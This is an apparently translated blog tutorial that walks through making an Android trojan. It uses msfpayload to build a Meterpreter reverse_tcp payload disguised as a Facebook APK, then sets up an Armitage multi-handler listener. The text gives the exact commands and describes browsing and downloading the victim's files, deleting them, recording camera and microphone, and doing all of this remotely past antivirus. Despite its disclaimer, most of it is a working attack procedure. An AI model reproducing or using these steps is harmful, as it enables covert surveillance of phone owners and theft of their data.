Android Security: sneak into someone else's Android system, let's see how!

Read Also: 7 tools pentesting for Ubuntu

I state that with this guide I do not want to entice you to do something like this against any person, this guide just wants to deepen how Google Antivirus (and not) Antivirus systems are inefficient, and they are not able to recognize a Malware now known by many years that is the so-called Payload Meterpreter "Android version".
the Payload is called android / meterpreter / reverse_tcp, and what do you ask?
Create a reverse connection between Android (however it is a real trojan) and our PC, so what can we do? The answer is simple, we can access the Android shell (or command line)
we can use commands like cd / storage / sdcard to access the internal memory of the phone and download all the victim's files or eventually delete them, with sysinfo we can have all the info on the Device, the Kernel and the language (java / java), the name (usually @localhost), take pictures with the webcam, record both with a microphone and a camera ... in short, not a few things, among other things risky as in the first case

First phase, malicious APK creation

Creating the Malevolent APK, inside it the PAYLOAD android / meterpreter / reverse_tcp trying to make it seem as far as possible the opposite

We use the command:

sudo msfpayload android / meterpreter / reverse_tcp LHOST = (Your IP) LPORT = (the one you want) R> /root/Desktop/facebook_4.0.apk (for Ubuntu: /home/Writing/facebook_4.0.apk)

then we open a linux shell, and type the command shown above:


for LHOST you have to type in another ifconfig console and see your LOCAL IP
for LPORT put 443

Second phase, transfer to the phone and installation (do not open)
Once we have the "facebook_4.0.apk" file, transfer it to our phone
I will use Airdroid.
We install the APK from the path where we transferred it
there will appear not Facebook but an app called "MainActivity".
Third phase, we open Armitage
Now let's open Armitage from the shell with the following commands:
sudo service postgresql start sudo service metasploit start sudo armitage
Fourth phase, setting up the "listener"
We will therefore have an interesting little program to carry out attacks of this type, let's set up the so-called Listener that will allow detection and intrusion into the Android system.
Then in the "Shell" (the black part at the bottom) we will write the following commands:
use exploit / multi / handler set PAYLOAD android / meterpreter / reverse_tcp set LHOST (PC local IP address) set LPORT (the port set when the APK was created) set ExitOnSession false exploit -j


Fifth and final phase, we open the apk and execute various commands

We have set up the listener, so we can start the APK from the phone, we wait a few moments and here in Armitage our device appears with a lot of IP address and logo of the operating system "seized" by lightning


from here we will be able to execute commands like sysinfo (to see info on the phone), cd (to browse through folders in the phone), and general Android commands, there are also Meterpreter commands, such as, for example, the possibility of recording from a webcam.
As we can see, by installing a simple APK, we can simply take control of the phone without any antivirus detecting it. This can be done remotely by setting our External IP in the LHOST section.

Receive the latest posts by email

Enter the email and choose the inscriptions on the new page
Added devices
  • Compare Smartphone (0)
  • Compare Notebook (0)